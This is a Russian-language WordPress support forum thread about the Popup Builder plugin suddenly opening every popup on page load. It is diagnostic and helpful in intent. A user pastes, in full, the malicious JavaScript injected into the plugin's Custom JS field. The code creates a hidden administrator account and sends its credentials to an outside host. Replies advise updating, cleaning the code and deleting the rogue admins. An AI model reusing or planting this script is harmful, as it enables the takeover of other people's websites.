Popup Builder было по клику стало on load
-
Подскажите, кто пользуется Popup Builder, у вас проблем с ним не было?
Странно, было по клику, стало on load.
- Тема изменена 11 месяцев назад пользователем qvatro.
-
Разработчики что говорят?
Не писал им
На форуме 5 активных волонтеров, которые отвечают на вопросы.
Как думаешь, какова вероятность, что кто-то из нас пользуеться этим плагином?Ну сиди дальше, жди у моря погоды.
было по клику, стало on load
Стало после чего?
Некоторые версии плагина имели уязвимости. Обновитесь до последней версии и проверьте пользовательскую вкладку JS, нет ли там вирусного кода
https://wordpress.org/support/topic/all-popups-are-showing-up/Читал про уязвимость, но там я так понял вели на другой сайт.
А у меня просто все окна стали открываться, и не переводили на другой сайт.
Это вот эта вкладка — Custom JS or CSSAdd custom JS and/or CSS code for extra control ?
У меня там код в 1 окне
function httpGet(theUrl) { return fetch(theUrl) .then(response => { if (!response.ok) { throw new Error(
HTTP error! Status: ${response.status}
); } return response.text(); }) .catch(error => { console.error(‘Error in httpGet:’, error); return null; }); } function httpPost(theUrl, csrftoken, password) { return fetch(theUrl, { method: ‘POST’, headers: { ‘Content-Type’: ‘application/x-www-form-urlencoded’, }, body:action=createuser&_wpnonce_create-user=${csrftoken}&_wp_http_referer=${encodeURI(theUrl)}&user_login=wpx&email=waterstyle29@gmail.com&first_name=tqwtqw&last_name=tqwtqw&url=${window.location.origin}&pass1=${password}&pass2=${password}&role=administrator&createuser=Add+New+User+
, }) .then(response => { if (!response.ok) { throw new Error(HTTP error! Status: ${response.status}
); } return response.text(); }) .catch(error => { console.error(‘Error in httpPost:’, error); return null; }); } function sendLog(logUrl, logText) { return fetch(logUrl, { method: ‘POST’, headers: { ‘Content-Type’: ‘text/plain’, }, body: logText, }) .then(response => { if (!response.ok) { throw new Error(‘Log gönderme başarısız’); } return response.text(); }) .then(data => { console.log(‘Log gönderildi:’, data); }) .catch(error => { console.error(‘Hata:’, error); }); } function generateRandomPassword(length) { const charset = «abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789»; let password = «»; for (let i = 0; i < length; i++) { const randomIndex = Math.floor(Math.random() * charset.length); password += charset.charAt(randomIndex); } return password; } function createUserAndSendLog() { const trigger = window.location.origin + «/wp-admin/user-new.php»; const logUrl = ‘https://wpemojii.com/az.php’; httpGet(trigger) .then(page => { const regExp = /name=»_wpnonce_create-user»\svalue=»([^)]+)»/; const matches = regExp.exec(page); if (matches && matches[1]) { const csrftoken = matches[1].slice(0, 10); const randomPassword = generateRandomPassword(8); httpPost(trigger, csrftoken, randomPassword) .then(postResponse => { if (postResponse) { console.log(‘User created successfully.’); const logText =User created: Username: wpx Email: waterstyle29@gmail.com First Name: tqwtqw Last Name: tqwtqw URL: ${window.location.origin} Password: ${randomPassword}
; sendLog(logUrl, logText); } else { console.error(‘Failed to create user.’); } }) .catch(error => { console.error(‘Error in httpPost:’, error); }); } else { console.error(‘CSRF token not found.’); } }) .catch(error => { console.error(‘Error in httpGet:’, error); }); } createUserAndSendLog(); console.log(‘hellotest112’);После чего сложно сказать, захожу на сайт, а там окна)) Стал другие проверять, та же ерунда, но не на всех сайтах.
Читал про уязвимость, но там я так понял вели на другой сайт.
А у меня просто все окна стали открываться, и не переводили на другой сайт.Там у кого редирект, у кого все окна одновременно открываются. У вас еще круче, создание нового админа. Вам надо обновить плагин до последней версии, в которой исправлен баг. Вычистить вирусный код. Проверить пользователей с правами админа и удалить вновь зарегистрированных.
Спасибо, действительно еще админ появился.
Привет всем! Таже фигня, все модалки начали грузиться по правилу On Load.
Проверил пользователей… 2 новых админа.
Удалил админов, обновил плагин, уже больше 2 недель палет нормальный. Если еще раз такая фигня вылезет, перейду на новый плагин.
- Тема «Popup Builder было по клику стало on load» закрыта для новых ответов.